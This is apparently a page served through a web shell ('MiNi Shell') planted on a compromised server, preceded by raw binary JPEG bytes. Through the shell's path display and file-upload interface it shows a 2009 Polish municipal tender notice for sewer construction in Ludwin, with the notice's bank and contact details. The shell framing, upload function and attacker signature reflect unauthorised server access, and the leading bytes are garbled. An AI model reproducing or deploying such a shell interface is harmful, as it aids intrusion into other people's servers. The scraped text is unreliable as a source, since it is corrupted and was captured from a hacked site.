JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20091016/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20091016/363006-N-2009.html

<p class="kh_header"><b>Ludwin: Budowa sieci kanalizacji sanitarnej do Ośrodka Wypoczynkowego n/j Piaseczno- etap I</b><br>
<b>Numer ogłoszenia: 363006 - 2009; data zamieszczenia: 16.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Ludwin , Ludwin 51, 21-075 Ludwin, woj. lubelskie, tel. 0-81 7570901, faks 0-81 7570028.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ludwin.powiatleczynski.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa sieci kanalizacji sanitarnej do Ośrodka Wypoczynkowego n/j Piaseczno- etap I.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest 
Budowa sieci kanalizacji sanitarnej do Ośrodka Wypoczynkowego nad j. Piaseczno- etap I
Od włączenia do istniejącej sieci PE 160 na działce 422 poprzez węzły SZ 28 - SZ 40   do działek obsługiwanych przez studnie rewizyjne S 71 do S 119 
Przewody podciśnieniowe z rur PE 80, SDR13,6, PN10 łączonych przez zgrzewanie doczołowe.
o średnicach:					
 PE 160 mm	            L=	 619,0 m
PE 110 mm		L=	150,0 m
PE 90 mm		L=	 92,0 m
ŁĄCZNIE:   L=    861,0 m
Uzbrojenie sieci kanalizacji podciśnieniowej:
-zasuwy sekcyjne Typu E kołnierzowe z obudową teleskopową typ 04 i skrzynką uliczną do zasuw 
DN I50 - 1 szt. 
DN I00 - 1 szt. 

-studzienki zbiorczo-zaworowe żelbetowe o wym.      1,0x1,0mx2,05m:   11 szt.
l,0xl,0mx2,55m:    2 szt.
  wyposażone we właz żeliwny ryglowy DN 1OOmm.
Studzienki powinny odpowiadać normie PN-92 B-10729.
Dodatkowo (ze względów eksploatacyjnych) wyposażono 2 studnie zbiorczo-zaworowe w zasuwki indywidualne dz 90mm montowane przed zaworem podciśnieniowym dz 90,
uzbrojenie studzienek ; zawory podciśnieniowe dz 90 - 14kpl

Przewody grawitacyjne  
Sieć grawitacyjną zaprojektowano z rur kanalizacyjnych kielichowych z PVC S (typ ciężki): PVC 0200 x 5,9mm i 0160 x 4,7mm.
     	  O 200 PVC, L=   494,0 m
  O 160 PVC, L=   537,0 m
-	studzienki połączeniowe PP DN 425 mm     - 121 kpl
  składające się z:
-kinety dla rur 0160mm i 20Omm,
-	rury karbowanej (trzon studzienki) fi 4OOmm,
-	przykrycia- włazy drogowe typu ciężkiego w jezdniach i typu lekkiego na posesjach prywatnych..
Wszystkie elementy są łączone za pomocą specjalnych uszczelek zapewniających szczelność studzienek. Również rury kanalizacyjne są łączone ze studzienką w podobny sposób.
Przyłącza - przykanaliki kanalizacji sanitarnej
Przykanaliki wykonać należy z rur kanalizacyjnych z PVC N (typ uniwersalny): PVC dz 160x4,0mm 
O 160 PVC,	L= 108,0 m
-	studzienki PP typu dz 315mm,         12 kpi.
Składające się z:
-kinety dla rur 0160mm i 20Omm,
-rury karbowanej (trzon studzienki) fi 3OOmm 
-przykrycia- włazy drogowe typu ciężkiego w jezdniach i typu lekkiego na posesjach prywatnych..
Wszystkie elementy są łączone za pomocą specjalnych uszczelek zapewniających szczelność studzienek. Również rury kanalizacyjne są łączone ze studzienką w podobny sposób.
Wykonawca wykona przedmiot zamówienia z materiałów własnych.
2. Czynności i roboty towarzyszące wchodzące w skład zamówienia.
1)Przeprowadzenie wszelkich badań i prób, analiz laboratoryjnych związanych z oceną 
   jakości materiałów oraz robót,
2)Geodezyjne wyznaczenie w terenie, a po wybudowaniu geodezyjna inwentaryzacja 
   powykonawcza poszczególnych części składowych określonych w projekcie budowlano-technicznym inwestycji.
3)Zapewnienie obsługi geodezyjnej - pomiary realizacyjne w trakcie realizacji robót.
4)Wykonanie wszelkich robót przygotowawczych, porządkowych, zagospodarowania placu budowy, utrzymania zaplecza budowy i innych niezbędnych do wykonania zadania.
5)Ręczne wykonanie robót ziemnych w rejonie istniejących urządzeń  podziemnych.
6)Realizacja robót z uwzględnieniem uwag i zaleceń zawartych w opinii Zespołu Uzgadniania  Dokumentacji Projektowej oraz wynikających z uzgodnień projektu budowlano- technicznego.
7) Szczelne szalowanie wykopów w pobliżu istniejących słupów napowietrznych een.
8) Zgłoszenie do dysponentów urządzeń podziemnych skrzyżowań sieci kanalizacyjnej  oraz przykanalików przed zasypaniem w celu dokonania odbioru. 
9)przygotowania dokumentacji powykonawczej w pełnym zakresie technicznym i   
   kosztorysowym.
10)Przygotowania dokumentacji wykonanego obiektu do zgłoszenia zamiaru rozpoczęcia użytkowania zgodnie z wymogami Ustawy Prawo Budowlane.
11)Organizacja i zapewnienie:
    -  dostawy, magazynowania, zabezpieczenia, ubezpieczenia materiałów i urządzeń 
        do wykonania przedmiotu zamówienia.
    -   utrzymania, zabezpieczenia Tereny Budowy, zaplecza, ochrony, ochrony p.poż,  zabezpieczenia BHP, utrzymania tablic ostrzegawczych, informacyjnych itp.
12)Zapewnienie:
     - odpowiedniego sprzętu i maszyn oraz ich utrzymanie i zasilanie,
     - dostaw mediów dla potrzeb wykonania robót objętych umową i utrzymania zaplecza budowy.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.24.10-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1. Zamawiający wymaga wniesienia wadium w wysokości  10 000,00zł
Wadium może być wnoszone w formach 
1) pieniądzu; 
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym; 
3) gwarancjach bankowych; 
4) gwarancjach ubezpieczeniowych; 
5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. zm.4)). 
Wadium wnoszone w formie pieniężnej należy wpłacić na konto zamawiającego z dopiskiem Budowa kanalizacji sanitarnej j.Piaseczno/2009.
Numer Konta Bankowego Bank Spółdzielczy Cyców oddział Ludwin 
POLUPLPRPL 36819110552001000000420003
Wadium musi być wniesione nie później niż w terminie składania ofert. 
Kserokopię dowodu wpłaty wadium lub dokument potwierdzający jego wniesienie w innej formie niż pieniądz należy dołączyć do oferty.
W przypadku wnoszenia wadium w formie pieniężnej za termin wniesienia wadium przyjmuje się datę uznania rachunku Zamawiającego.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienie mogą ubiegać się wykonawcy potwierdzający spełnienie warunków:
1) Posiadający uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
2) Posiadający niezbędna wiedzę i doświadczenie oraz dysponujący potencjałem technicznym i osobami zdolnymi do wykonania zamówienia; lub którzy przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.
- warunek ten będzie spełniony przez wykonawcę jeżeli:
a)w okresie ostatnich 5 lat przed dniem wszczęcia niniejszego postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie wykonał co najmniej 2 zakończone roboty budowlane odpowiadających swoim rodzajem i wartością przedmiotowi zamówienia. Za roboty odpowiadające swoim rodzajem przedmiotowi zamówienia zamawiający uważa roboty polegające na budowie sieci kanalizacji podciśnieniowej. Za roboty odpowiadające wartością przedmiotowi zamówienia zamawiający uważa roboty o łącznej wartości brutto równej lub przekraczającej kwotę 1 250 000,00 zł. ( dopuszczalna możliwość zsumowania 2 robót) Zamawiający wymaga, aby wartość pojedynczego wykonanego zamówienia była wartością zamówienia realizowanego na 1 obiekcie budowlanym (nie dopuszcza się sumowania wartości obiektów o niższych wartościach wykonywanych dla jednego inwestora). Wykonawca załączy dokumenty potwierdzające, że roboty te zostały wykonane z należytą starannością, 
b) zapewni udział przy realizacji robót kierownika budowy posiadającego uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci wodociągowych i kanalizacyjnych i należącego do Okręgowej Izby Inżynierów Budownictwa,
3) Znajdujący się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
 warunek ten będzie spełniony przez wykonawcę jeżeli:
a) jest ubezpieczony od odpowiedzialności cywilnej (odpowiedzialność deliktowa) w zakresie prowadzonej działalności gospodarczej na kwotę nie niższą niż 500.000.00 zł.
b) nie zalega ze składkami na Ubezpieczenia Społeczne
c) nie zalega z podatkami 
4) Nie podlegający wykluczeniu z postępowania o udzielenie zamówienia.
2. z ubiegania się o zamówienia publicznego wyklucza się wykonawców, którzy:
1) nie spełniają warunków udziału w postępowaniu o zamówienie publiczne z art. 22 Prawa zamówień publicznych opisanych w ppkt. 1 do 4.
2) podlegają  wykluczeniu z postępowania na podstawie art. 24 ust. 1 Prawa zamówień publicznych.
3) wykonywali bezpośrednio czynności związane z przygotowaniem prowadzonego postępowania, lub posługiwali się w celu sporządzenia oferty osobami uczestniczącymi w dokonywaniu tych czynności chyba, że udział tych wykonawców w postępowaniu nie utrudnia uczciwej konkurencji.
4) złożyli nieprawdziwe informacje mające wpływ na wynik prowadzonego postępowania. 
5) nie złożyli oświadczenia o spełnianiu warunków udziału w postępowaniu lub dokumentów potwierdzających spełnianie tych warunków lub złożone dokumenty zawierają błędy z zastrzeżeniem art. 26 ust. 3 Prawa zamówień publicznych.
3. Zamawiający odrzuca ofertę jeżeli:
1) jest niezgodną z ustawą
2) jej treść nie odpowiada treści specyfikacji istotnych warunków zamówienia, z zastrzeżeniem art. 87 ust. 2 pkt. 3 Prawa zamówień publicznych.
3) jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji 
4) zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia,  
5) została złożona przez wykonawcę wykluczonego z udziału w postępowaniu o udzielenie zamówienia.
6) zawiera błędy w obliczeniu ceny 
7) wykonawca w terminie 3 dni od dnia doręczenia zawiadomienia nie zgodził się na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt. 3 Prawa zamówień publicznych 
8) jest nieważna na podstawie odrębnych przepisów, 
4. ofertę wykonawcy wykluczonego uznaje się za odrzuconą
5. ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia -niespełna..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.Na ofertę składają się następujące dokumenty i załączniki:
1) formularz ofertowy wraz załącznikami - wypełniony i podpisany przez wykonawcę
2) oświadczenie o spełnieniu warunków udziału w postępowaniu o zamówienie publiczne - wypełnione i podpisane przez wykonawcę
2.W celu potwierdzenia: spełnienia warunku posiadania przez wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia;  że wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 Prawa zamówień; potwierdzenia spełnienia warunku znajdowania się przez wykonawcę w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia należy złożyć następujące dokumenty
1) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, 
2)aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających, że wykonawca nie zalega z opłacaniem opłat oraz składek na ubezpieczenie zdrowotne i społeczne lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji 
właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
3)aktualne zaświadczenie właściwego naczelnika urzędu skarbowego, potwierdzające, że wykonawca nie zalega z opłacaniem podatków lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji 
właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, 
4) )w okresie ostatnich 5 lat przed dniem wszczęcia niniejszego postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie wykonał co najmniej 2 zakończone roboty budowlane odpowiadających swoim rodzajem i wartością przedmiotowi zamówienia. Za roboty odpowiadające swoim rodzajem przedmiotowi zamówienia zamawiający uważa roboty polegające na budowie sieci kanalizacji podciśnieniowej. Za roboty odpowiadające wartością przedmiotowi zamówienia zamawiający uważa roboty o łącznej wartości brutto równej lub przekraczającej kwotę 1 250 000,00 zł. ( dopuszczalna możliwość zsumowania 2 robót) Zamawiający wymaga, aby wartość pojedynczego wykonanego zamówienia była wartością zamówienia realizowanego na 1 obiekcie budowlanym (nie dopuszcza się sumowania wartości obiektów o niższych wartościach wykonywanych dla jednego inwestora). 
Do wykazu załączyć należy dokumenty potwierdzające, że roboty te zostały wykonane z należytą starannością. Wskazane jest sporządzenie wykazu wg wzoru określonego w załączniku do specyfikacji istotnych warunków zamówienia. 
5)wykaz osób, w szczególności wskazanie kierownika robót, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonaniu zamówienia, wraz z informacjami o ich kwalifikacjach zawodowych, doświadczeniu i wykształceniu niezbędnym do wykonania zamówienia, a także zakres wykonywanych przez nie czynności. 
W przypadku wpisania w wykazie o którym mowa osób którymi wykonawca będzie dysponował należy załączyć pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia.
Wskazane jest sporządzenie wykazu wg wzoru określonego w specyfikacji istotnych warunków zamówienia,
6) dokument stwierdzający posiadanie uprawnień budowlanych przez osobę wskazaną jako kierownik budowy do pełnienia samodzielnych funkcji technicznych w budownictwie i kierowania robotami w specjalności instalacyjnej w zakresie sieci wodociągowych i kanalizacyjnych oraz aktualne zaświadczenie, że kierownik budowy jest członkiem Okręgowej Izby Inżynierów Budownictwa,
 
7)polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę nie niższą niż 500 000,00 zł. 
8)Oświadczenie, które należy załączyć do oferty:
oświadczenie, że wykonawca spełnia warunki udziału w postępowaniu o udzielenie zamówienia wynikające z art. 22 ust.1 ustawy Prawo zamówień publicznych i nie podlega wykluczeniu z postępowania o udzielenie zamówienia publicznego na podstawie art. 24 ust 1 i 2 ustawy Prawo zamówień publicznych. 
9) Dowód wpłaty wadium.

3.W przypadku jeżeli ofertę składa konsorcjum dokumenty wymienione w pkt .VI.  ust. 2 pkt. 1-3 składa każdy z członków konsorcjum. Dokumenty wymienione w pkt .VI.  ust. 2 pkt. 4-8 mogą być przedstawione przez jednego z członków konsorcjum lub wspólnie. Oświadczenie o spełnianiu warunków udziału w postępowaniu wskazanych w art. 22 ust. 1 pkt 1-3 ustawy Prawo zamówień publicznych składają wszyscy członkowie konsorcjum wspólnie lub pełnomocnik konsorcjum w imieniu wszystkich jego członków;
Oświadczenia o spełnianiu warunku udziału w postępowaniu o udzielenie zamówienia publicznego wskazanego w art. 22 ust. 1 pkt 4 i nie podleganiu wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych składa odrębnie każdy członek konsorcjum. 
4. Wykonawca zamieszkały poza terytorium Rzeczypospolitej Polskiej:
 Zamiast dokumentów, o których mowa w pkt.VI.  składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
1) nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
2) nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
3) nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 

5. Dokumenty wymagane w przypadku składania oferty wspólnej: 
1) Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia, w takim przypadku dla ustanowionego pełnomocnika do oferty należy załączyć pełnomocnictwo do reprezentowania w postępowaniu lub do reprezentowania w postępowaniu i zawarcia umowy
6. Postanowienia dotyczące składanych dokumentów
1) wyżej wymienione dokumenty mogą być złożone w formie oryginałów lub kserokopii potwierdzonych za zgodność przez Wykonawcę lub osobę / osoby uprawnione do podpisania oferty z dopiskiem za zgodność z oryginałem.
2) dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez wykonawcę.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.ludwin.powiatleczynski.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Ludwinie
21-075 Ludwin
Ludwin 51.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.11.2009 godzina 10:00, miejsce: Urząd Gminy w Ludwinie
21-075 Ludwin
Ludwin 51
pok. nr 5.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com